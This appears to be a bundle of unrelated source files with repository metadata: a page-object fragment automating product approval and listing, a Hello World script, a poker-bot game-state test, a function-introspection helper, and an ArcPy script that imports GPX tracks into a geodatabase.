        self.base_click(page.pd_list_click_pdlist)
    # Start the product approval flow: click "submit for approval".
    def addpd_pdlist_click_sp(self):
        sleep(1)
        self.base_click(page.pd_list_submit_sp, 2)
    # After review, click "approve".
    def addpd_pdlist_click_pass(self):
        sleep(1)
        self.base_click(page.pd_list_click_pass, 2)
    # Once approved, click "put on sale".
    def addpd_pdlist_click_sj(self):
        sleep(1)
        log.info("商品成功上架了")
        self.base_click(page.pd_list_click_sj, 2)
    # Composite flow: create a SKU, then submit both the SKU and the product
    # through approval to the "on sale" state.
    def addpd_add_sku(self, period, skuname, originprice, especialprice):
        """
        :param period: camp period of the SKU
        :param skuname: name of the SKU
        :param originprice: original price of the SKU
        :param especialprice: special (discount) price of the SKU
        :return:
        """
        self.addpd_click_addsku_manage()
        self.addpd_click_addsku()
        self.addpd_click_addsku_btn()
        self.addpd_input_sku_period(period)
        self.addpd_choose_sku_starttime()
        self.addpd_input_skuname(skuname)
        self.addpd_input_origin_price(originprice)
        self.addpd_input_especial_price(especialprice)
        self.addpd_addsku_first_savebtn()
        self.addpd_addsku_second_savebtn()
        self.addpd_skulist_click_sp()
        self.addpd_skulist_click_pass()
        self.addpd_skulist_click_sj()
        self.addpd_click_pdlist()
        self.addpd_pdlist_click_sp()
        self.addpd_pdlist_click_pass()
        self.addpd_pdlist_click_sj()
    # After the product goes on sale, fetch its listed status text
    # (used by assertions).
    def addpd_get_pd_status(self):
        return self.base_get_text(page.pd_list_get_pd_status)
8f1faad7bde758452ef4d2a9d41f7ca9f9c97b66 | Python | uzzal71/python-fundamentals | /HelloWorld3.py | UTF-8 | 79 | 2.65625 | 3 | [
"MIT"
] | permissive | print('Hello World!')
print('Hello Human, What is your name?')
name = input()
| true |
ba84820b6fff6ab739a4482f03f2f7168e5b2b43 | Python | tamasCsontos/poker-player-game-on | /tests/test_game.py | UTF-8 | 2,138 | 2.53125 | 3 | [
"MIT"
] | permissive | import game
# Canned game-state payload used as the fixture for the GameState tests:
# three players, with three community cards dealt. Only the second player
# (id 1, "Game On") carries hole cards.
GAME_STATE_JSON = {
    'tournament_id':'550d1d68cd7bd10003000003',
    'game_id':'550da1cb2d909006e90004b1',
    'round': 0,
    'bet_index': 0,
    'small_blind': 10,
    'current_buy_in': 320,
    'pot': 400,
    'minimum_raise': 240,
    'dealer': 1,
    'orbits': 7,
    'in_action': 1,
    'players': [
        {
            'id': 0,
            'name': 'Albert',
            'status': 'active',
            'version': 'Default random player',
            'stack': 1010,
            'bet': 320
        },
        {
            # The player under test ("Game On") -- the only one with hole cards.
            'id': 1,
            'name': 'Game On',
            'status': 'active',
            'version': 'Default random player',
            'stack': 1590,
            'bet': 80,
            'hole_cards': [
                {
                    'rank': '6',
                    'suit': 'hearts'
                },
                {
                    'rank': 'K',
                    'suit': 'spades'
                }
            ]
        },
        {
            'id': 2,
            'name': 'Chuck',
            'status': 'out',
            'version': 'Default random player',
            'stack': 0,
            'bet': 0
        }
    ],
    'community_cards': [
        {
            'rank': '4',
            'suit': 'spades'
        },
        {
            'rank': 'A',
            'suit': 'hearts'
        },
        {
            'rank': '6',
            'suit': 'clubs'
        }
    ]
}
def test_game_state_details():
    """GameState should expose every relevant field of the raw payload."""
    state = game.GameState(GAME_STATE_JSON)
    # Fields copied straight through from the payload.
    passthrough_fields = (
        "tournament_id", "game_id", "round", "pot", "orbits",
        "dealer", "small_blind", "minimum_raise", "in_action",
    )
    for field in passthrough_fields:
        assert getattr(state, field) == GAME_STATE_JSON[field]
    # Derived field: the big blind is twice the small blind.
    assert state.big_blind == GAME_STATE_JSON['small_blind'] * 2
    # The player identified as ours.
    assert state.own_player.id == 1
    assert state.own_player.name == "Game On"
| true |
fb9d9e291dafd71cf2d08844016ed6956e9d36f1 | Python | ofekashery/Ovl-Python | /ovl/helpers/get_defined_functions.py | UTF-8 | 739 | 3.09375 | 3 | [
"Apache-2.0"
] | permissive | from inspect import getmembers, isfunction
def get_defined_methods():
    """Collect every plain function reachable from this module's globals.

    Each global object's members are scanned; members that are functions are
    recorded directly, while other members are scanned one level deeper for
    functions of their own.

    :return: list of ``(name, function)`` tuples (duplicates possible)
    """
    found = []
    for _name, obj in globals().items():
        for member_name, member in getmembers(obj):
            if isfunction(member):
                found.append((member_name, member))
                continue
            found.extend(
                (inner_name, inner)
                for inner_name, inner in getmembers(member)
                if isfunction(inner)
            )
    return found
| true |
bffcd38ecdb78f19f9bce41c68f514358a200e5d | Python | jclarke100/PythonMapping | /ImportGPX.py | UTF-8 | 1,925 | 2.984375 | 3 | [] | no_license | """
Script to import all GPX tracks from a folder into a line feature class
in a file geodatabase. New line feature for each GPX file.
Generate linear density map of those lines to show where most tracks go.
Parameters:
1 - Path to source folder of GPX files
2 - Target feature class to which data is appended
3 - Option to truncate target feature class before data load
TODO:
Could do with some error handling, create FGDB if it doesn't exist etc
Also doesn't carry any attributes through from GPX, date/time would be good
"""
import sys, arcpy, os
def main():
print "Script started"
gpxFolder = sys.argv[1]
target = sys.argv[2]
doTruncate = sys.argv[3]
##gpxFolder = r"c:\stuff\python\gpx"
##target = r"c:\stuff\python\GPS.gdb\Tracks_1"
##doTruncate = False
if not os.path.isdir(gpxFolder):
print "No source folder found: " + gpxFolder
sys.exit(1)
if not arcpy.Exists(target):
print "No target found: " + target
sys.exit(1)
if doTruncate:
try:
print "Truncating %s..." % target
arcpy.TruncateTable_management(target)
except:
print "Target not found or can't truncate"
sys.exit()
for f in os.listdir(gpxFolder):
print "Processing file %s" % f
print "\tconvert to points in_mem"
arcpy.GPXtoFeatures_conversion(gpxFolder + "\\" + f, "in_memory\\track")
print "\tconvert in_memory points to lines"
arcpy.PointsToLine_management("in_memory\\track", "in_memory\\track_line")
print "\tadd the new in_mem line to target feature class"
arcpy.AddMessage(f)
print("\t" + f)
arcpy.Append_management("in_memory\\track_line", target, "NO_TEST")
# Line density stuff todo - needs Spatial Analyst
# lineDensity = LineDensity(target, "", 10, 20)
if __name__ == '__main__':
main()
| true |